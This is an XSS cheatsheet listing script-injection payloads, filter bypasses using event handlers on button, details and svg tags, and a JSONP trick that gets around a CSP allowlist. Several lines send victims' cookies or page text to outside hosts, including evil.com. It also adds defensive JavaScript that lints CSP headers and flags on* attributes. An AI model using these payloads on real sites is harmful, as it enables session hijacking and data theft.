Execute code
XSS without filters
<script>alert()</script>
Bypass filters on <script> tags
<img src="" onerror="alert()">
<body onload="alert()">
Retrieve another user's cookies
<script>document.location.replace("http://endpoint?cookie="+document.cookie)</script>
Without redirection:
<script>document.write('<img src="http://endpoint?cookie='+document.cookie+'">')</script>
Data exfiltration
Exfiltrate data from the current page
<script>document.location.replace("http://endpoint?data="+document.body.innerText)</script>
Dangling Markup:
<img src="http://endpoint?data=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
Bypass Chrome restrictions:
<table background='//endpoint?data=
Using Ajax
<script>
var getData = new XMLHttpRequest();
getData.open("GET", "http://page-where-data-is", false);
getData.send();
var sendData = new XMLHttpRequest();
sendData.open("GET", "http://endpoint?data="+getData.responseText, false);
sendData.send();
</script>
Use JSONP endpoints to exploit CSP whitelists
<script src="http://jsonp-endpoint-which-is-in-whitelist?callback=alert()"></script>
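The JSONP trick above works because a host-based script-src allowlist trusts every response from the listed host, including a JSONP endpoint that echoes a caller-chosen callback. As an added example (not part of the original cheatsheet), here is a small linter for a Content-Security-Policy header string that flags exactly that weakness, plus 'unsafe-inline' and wildcard sources, and builds the nonce-based policy that removes the host allowlist from the decision. The parsing is a simplified assumption (directives split on ';', sources on whitespace), and the header strings used in the test are constructed.

```javascript
// Added example: lint a CSP header for the weaknesses the JSONP bypass relies on.
// Not from the original page; the parsing rules are a simplified assumption.

function parseCsp(header) {
  // Split "name src src; name src" into { name: [src, ...] }.
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    directives[name.toLowerCase()] = values;
  }
  return directives;
}

function isHostSource(v) {
  // Quoted keywords ('self', 'none', 'nonce-...', 'sha256-...') and
  // scheme-only sources (https:) are not host allowlist entries.
  if (v.startsWith("'")) return false;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(v)) return false;
  return true;
}

function lintScriptSrc(header) {
  // Returns a list of human-readable findings; empty means no issue found.
  const d = parseCsp(header);
  const src = d['script-src'] || d['default-src'] || [];
  const findings = [];
  const hasNonceOrHash = src.some(v => /^'(nonce|sha(256|384|512))-/.test(v));
  const strictDynamic = src.includes("'strict-dynamic'");
  const hosts = src.filter(isHostSource);

  // Browsers ignore 'unsafe-inline' once a nonce or hash is present.
  if (src.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("unsafe-inline: inline <script> and on* handlers execute");
  }
  // With 'strict-dynamic' the host list is ignored, so it is only a problem without it.
  if (hosts.length > 0 && !strictDynamic) {
    findings.push(
      `host allowlist (${hosts.join(', ')}): a JSONP endpoint on an allowed host ` +
      'returns attacker-chosen code (the callback parameter) under the policy');
  }
  if (src.includes('*')) findings.push('wildcard source: any host may serve scripts');
  return findings;
}

function hardenedPolicy(nonce) {
  // The nonce must be generated fresh per response from a CSPRNG; it is a
  // parameter here so the function stays deterministic for the example.
  return `script-src 'nonce-${nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'none'`;
}

// Constructed sample policies for illustration.
const WEAK_POLICY = "default-src 'self'; script-src 'self' https://cdn.example.com 'unsafe-inline'";
console.log(lintScriptSrc(WEAK_POLICY));
console.log(lintScriptSrc(hardenedPolicy('d41d8cd98f00')));
```

With the hardened policy, the `<script src="...jsonp...?callback=alert()">` element is blocked unless it carries the per-response nonce, regardless of which hosts are otherwise trusted.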
Bypass common filters
You can use the .concat() function instead of +
<script>document.location.replace("http://endpoint?cookie=".concat(document.cookie))</script>
Bypass filters on common tags <script>, <img>, <a>, <body>…
<button onfocus="alert()" autofocus>
<details ontoggle="alert()" open>payload</details>
<svg><animate onbegin="alert()" attributeName=x dur=1s>
<svg><animate onend="alert()" attributeName=x dur=1s>
<svg><animate onrepeat="alert()" attributeName=x dur=1s repeatCount=2 />
<svg><set onbegin="alert()" attributename=x dur=1s>
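Every bypass in this section defeats a tag blocklist by moving the handler onto a tag the filter did not list (button, details, svg animate/set). The durable defence is to reject or strip the attribute class itself. As an added example (not code from the original cheatsheet), here is a scanner that tokenizes an HTML fragment and reports any <script> element or any on* attribute on any element, so the payloads above are all caught by the same rule. The regex tokenizer is a simplified assumption, adequate for a detection check over untrusted input but not a substitute for a full HTML-parsing sanitizer; the sample inputs in the test are constructed.

```javascript
// Added example: flag script elements and on* event-handler attributes on
// any tag. Not from the original page; the tokenizer is a simplified assumption.

// Tag name plus the raw attribute text up to (but excluding) the closing '>'.
// The '>' is optional so that dangling (unterminated) tags are still scanned.
const TAG_RE = /<\s*([a-zA-Z][\w:-]*)([^>]*)>?/g;
// Attribute name, optionally followed by a quoted or unquoted value.
const ATTR_RE = /([^\s=/"'<>]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;

function findDangerousMarkup(html) {
  // Returns one finding per script element or event-handler attribute found.
  const findings = [];
  for (const m of html.matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase();
    const attrBlob = m[2];
    if (tag === 'script') {
      findings.push({ tag, attr: null, reason: 'script element' });
    }
    for (const a of attrBlob.matchAll(ATTR_RE)) {
      const name = a[1].toLowerCase();
      // Attribute-class rule: any on* attribute is an inline handler,
      // whichever element carries it.
      if (name.startsWith('on')) {
        findings.push({ tag, attr: name, reason: 'event handler attribute' });
      }
    }
  }
  return findings;
}

function isMarkupSafe(html) {
  return findDangerousMarkup(html).length === 0;
}

// Constructed samples: the page's payloads and a benign fragment.
const SAMPLES = [
  '<img src="" onerror="alert()">',
  '<button onfocus="alert()" autofocus>',
  '<details ontoggle="alert()" open>payload</details>',
  '<svg><animate onbegin="alert()" attributeName=x dur=1s>',
  '<svg><set onbegin="alert()" attributename=x dur=1s>',
  '<p class="note">hello <b>world</b></p>',
];
for (const s of SAMPLES) {
  console.log(isMarkupSafe(s) ? 'safe   ' : 'flagged', s, findDangerousMarkup(s));
}
```

Run the scanner on user-supplied HTML before it is stored or reflected; in production, pair it with (or replace it by) a parser-based sanitizer that enforces an element and attribute allowlist, since a regex tokenizer can be confused by malformed markup.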